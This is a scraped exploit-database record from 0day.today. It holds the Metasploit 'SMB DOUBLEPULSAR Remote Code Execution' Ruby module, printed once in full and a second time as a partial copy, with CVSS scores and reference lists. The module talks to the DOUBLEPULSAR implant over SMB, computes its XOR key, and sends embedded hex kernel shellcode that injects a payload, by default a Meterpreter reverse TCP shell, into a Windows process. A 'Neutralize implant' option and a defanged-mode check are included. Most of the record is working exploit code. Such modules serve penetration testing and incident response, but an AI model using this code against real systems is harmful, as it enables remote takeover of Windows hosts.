'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:16:45", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "28ecf00b74016bd4aaac4123a39feb9e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-02T22:16:00", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n 